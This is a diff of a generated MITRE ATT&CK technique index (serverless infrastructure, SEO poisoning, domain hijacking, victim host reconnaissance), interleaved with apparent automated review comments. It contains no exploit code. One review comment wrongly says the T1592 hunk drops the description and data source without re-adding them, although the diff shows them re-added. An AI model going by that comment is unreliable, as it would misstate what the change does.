+ Human Rights Defender. Retrieved December 12, 2016.'
+ url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+ - source_name: FireEyeSupplyChain
+ description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+ SunshopFireEye. Retrieved March 6, 2017.'
+ url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: NationsBuying
+ description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+ Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+ url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1650:
technique:
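Review bot: the one content change buried in this T1588 hunk is the `Recorded Future Beacon Certificates` reference: its URL moves from `https://www.recordedfuture.com/cobalt-strike-servers/` to `https://www.recordedfuture.com/research/cobalt-strike-servers` and the retrieved date is updated to September 16, 2024, which matches the new `modified` timestamp of 2024-09-16. The description, detection text and `x_mitre_version: '1.1'` are unchanged, so this is a reference fix only and is fine as-is. The newly added `revoked: false` and `x_mitre_deprecated: false` keys deserve a mention in the PR description since they are new fields for consumers of this index.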
@@ -54584,37 +55243,38 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.007:
technique:
- modified: '2022-10-20T21:19:57.555Z'
+ modified: '2024-10-03T14:18:34.045Z'
name: Serverless
description: "Adversaries may compromise serverless cloud infrastructure, such
- as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
- By utilizing serverless infrastructure, adversaries can make it more difficult
- to attribute infrastructure used during operations back to them. \n\nOnce
- compromised, the serverless runtime environment can be leveraged to either
- respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+ as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+ can be used during targeting. By utilizing serverless infrastructure, adversaries
+ can make it more difficult to attribute infrastructure used during operations
+ back to them. \n\nOnce compromised, the serverless runtime environment can
+ be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
traffic to an adversary-owned command and control server.(Citation: BlackWater
- Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
- by these functions will appear to come from subdomains of common cloud providers,
- it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+ Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+ Apps Script Abuse 2021) As traffic generated by these functions will appear
+ to come from subdomains of common cloud providers, it may be difficult to
+ distinguish from ordinary traffic to these providers - making it easier to
+ [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
Workers)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
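Review bot: the T1584.007 description now cites `(Citation: GWS Apps Script Abuse 2021)`; confirm that the `external_references` entry with exactly that `source_name` lands in the same file (it is added in the following hunk), because ATT&CK citation markers resolve by exact string match and a mismatch leaves a dangling citation in rendered text. The content change itself (adding Google Apps Scripts and the link to [Hide Infrastructure](https://attack.mitre.org/techniques/T1665)) is paired with the `x_mitre_version` bump from '1.0' to '1.1' and the new `modified` date of 2024-10-03, which is consistent. The remaining lines in this hunk are the same contributor and key reorder seen elsewhere in the patch.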
@@ -54638,11 +55298,14 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.004:
technique:
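Review bot: the new `GWS Apps Script Abuse 2021` URL ends in `#google_vignette`, an ad-interstitial fragment that the site appends to the address bar; it is not part of the article location. The canonical URL is `https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/`. Because this file is generated from upstream ATT&CK data, report the stray fragment upstream rather than hand-editing it here, otherwise the next regeneration reintroduces it.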
@@ -54700,17 +55363,18 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.006:
technique:
- modified: '2023-03-13T20:35:52.302Z'
+ modified: '2024-08-14T15:03:56.383Z'
name: SEO Poisoning
description: |-
Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
+ In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
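Review bot: the new T1608.006 paragraph on in-site search manipulation has a missing space in `popularity(Citation: Chexmarx-seo)` and a citation key spelled `Chexmarx` rather than `Checkmarx`. The key does resolve, because the `external_references` entry added later in this patch carries the same misspelling, but both are upstream ATT&CK text issues worth reporting so a later upstream correction of the key does not orphan the citation in a regenerated index. The `modified` date of 2024-08-14 matches the version bump to '1.1' that follows.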
@@ -54718,7 +55382,7 @@ resource-development:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Vijay Lalwani
- Will Thomas, Equinix Threat Analysis Center (ETAC)
- Will Jolliffe
@@ -54732,7 +55396,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -54765,11 +55429,18 @@ resource-development:
description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
September 30, 2022.
url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+ - source_name: Chexmarx-seo
+ description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+ the Star Ranking Game. Retrieved June 18, 2024.'
+ url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+ - source_name: Checkmarx-oss-seo
+ description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+ Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+ url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.003:
technique:
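Review bot: the two new Checkmarx references use inconsistent `source_name` spellings, `Chexmarx-seo` and `Checkmarx-oss-seo`. Both match their citation keys in the updated description so they render, but the first is a typo in the upstream data; report it rather than fixing it here, since a local edit would be overwritten on the next regeneration and an upstream-only fix would break the citation match. Both entries carry a retrieved date of June 18, 2024, consistent with the `modified` date of 2024-08-14 and the `x_mitre_version` bump to '1.1' earlier in this patch.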
@@ -54791,7 +55462,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:19:50.018Z'
name: Code Signing Certificates
description: |-
Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
@@ -54809,47 +55480,10 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
- type: attack-pattern
- created: '2020-10-01T01:30:00.877Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1587
- url: https://attack.mitre.org/techniques/T1587
- - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
- description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
- Units. Retrieved July 18, 2016.
- source_name: Mandiant APT1
- - source_name: Kaspersky Sofacy
- description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
- 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
- December 10, 2015.
- url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
- - source_name: Bitdefender StrongPity June 2020
- url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
- description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
- Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
- - source_name: Talos Promethium June 2020
- url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
- description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
- reach with StrongPity3 APT. Retrieved July 20, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:31:17.270Z'
name: Develop Capabilities
description: |-
Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
@@ -54858,21 +55492,57 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+ created: '2020-10-01T01:30:00.877Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1587
+ external_id: T1587
+ - source_name: Kaspersky Sofacy
+ description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+ 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+ December 10, 2015.
+ url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Mandiant APT1
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ - source_name: Talos Promethium June 2020
+ description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+ reach with StrongPity3 APT. Retrieved July 20, 2020.
+ url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+ - source_name: Bitdefender StrongPity June 2020
+ description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+ Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+ url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1588.005:
technique:
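Review bot: for T1587 the `modified` timestamp advances to 2024-10-15 but `x_mitre_version` stays at '1.1', and no change to the description, detection text or reference content is visible in this patch; the differences are the key reorder, the reference reorder (I checked that all six `source_name`s removed above, `mitre-attack`, `Mandiant APT1`, `Kaspersky Sofacy`, `Bitdefender StrongPity June 2020`, `Talos Promethium June 2020` and `Splunk Kovar Certificates 2017`, reappear with the same URLs), and the new `revoked: false` and `x_mitre_deprecated: false` keys. If the upstream 2024-10-15 edit touched content that sits outside these hunks, the PR description should say so; if not, this is a pure metadata change and fine as-is.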
@@ -54912,7 +55582,7 @@ resource-development:
description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:14:01.255Z'
name: Exploits
description: |-
Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -54931,15 +55601,13 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.001:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-24T15:10:40.270Z'
name: Domains
description: |-
- Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+ Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
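Review bot: the T1584.001 description now adds compromise of a cloud DNS management service (e.g., AWS Route53) as a domain-hijacking path, but the `x_mitre_detection` text, shown as unchanged context in the next hunk, still only covers registrant and resolution changes. From a defender's view the cloud control plane is where this new vector is visible (audit logging of DNS management API calls at the provider), and since the detection guidance lives upstream in ATT&CK this is a gap to raise there rather than in this generated index. The description change is consistent with the `x_mitre_version` bump from '1.3' to '1.4' and the `modified` date of 2024-09-24 that follow.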
@@ -54947,19 +55615,19 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Jeremy Galloway
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.3'
- x_mitre_contributors:
- - Jeremy Galloway
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -54993,55 +55661,64 @@ resource-development:
url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
reconnaissance:
T1592:
technique:
- x_mitre_platforms:
- - PRE
+ modified: '2024-10-03T19:35:07.269Z'
+ name: Gather Victim Host Information
+ description: |-
+ Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
+
+ Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
+
+ Adversaries may also gather victim host information via User-Agent HTTP headers, which are sent to a server to identify the application, operating system, vendor, and/or version of the requesting user agent. This can be used to inform the adversary’s follow-on action. For example, adversaries may check user agents for the requesting operating system, then only serve malware for target operating systems while ignoring others.(Citation: TrellixQakbot)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: reconnaissance
+ x_mitre_contributors:
+ - Sam Seabrook, Duke Energy
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
+
+ Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
x_mitre_domains:
- enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Internet Scan: Response Content'
type: attack-pattern
+ id: attack-pattern--09312b1a-c3c6-4b45-9844-3ccc78e5d82f
created: '2020-10-02T16:39:33.966Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1592
url: https://attack.mitre.org/techniques/T1592
+ external_id: T1592
- source_name: ATT ScanBox
- url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
+ url: https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks
+ - source_name: TrellixQakbot
+ description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
+ Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
+ Distribution. Retrieved August 1, 2024.
+ url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
- name: Gather Victim Host Information
- description: |-
- Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).
-
- Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: reconnaissance
- x_mitre_detection: |-
- Internet scanners may be used to look for patterns associated with malicious content designed to collect host information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)
-
- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.1'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1596.003:
technique:
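Review bot: the `x_mitre_data_sources` block (`'Internet Scan: Response Content'`) removed from Gather Victim Host Information has no `+` counterpart in the visible part of this hunk, and the `description`, `kill_chain_phases`, `x_mitre_detection` and `x_mitre_version: '1.1'` keys are deleted while only `url`, `object_marking_refs` and `x_mitre_attack_spec_version: 3.2.0` are added. If the generator is re-serialising the object in a new key order, confirm that the earlier part of the hunk re-adds those keys; otherwise the entry loses its description and data source. The `ThreatConnect Infrastructure Dec 2020` reference also moves `url` after `description`, which matches the layout of the other regenerated references in this patch.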
@@ -55066,7 +55743,7 @@ reconnaissance:
url: https://medium.com/@menakajain/export-download-ssl-certificate-from-server-site-url-bcfc41ea46a2
description: Jain, M. (2019, September 16). Export & Download — SSL Certificate
from Server (Site URL). Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:48:37.628Z'
name: Digital Certificates
description: |-
Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.
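Review bot: the `modified` timestamp for Digital Certificates moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-04-15T03:48:37.628Z`. A modified date that regresses usually means the entry is being regenerated from a different STIX bundle than the one the file was last built from; the same backwards move appears on most of the reconnaissance entries in this patch (Purchase Technical Data, IP Addresses, WHOIS, Network Topology and others), so confirm in the commit message which ATT&CK release the index was generated from.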
@@ -55082,8 +55759,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1597.002:
technique:
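Review bot: both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are dropped from T1596.003 with nothing added in their place, whereas other entries in this patch get `x_mitre_attack_spec_version: 3.2.0` re-added. If anything downstream treats these `technique` mappings as STIX 2.1 objects, `spec_version` is a required common property there; if the index is only consumed by the atomics tooling this is harmless, but the inconsistency between "bumped" and "removed" across entries should be explained.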
@@ -55105,7 +55780,7 @@ reconnaissance:
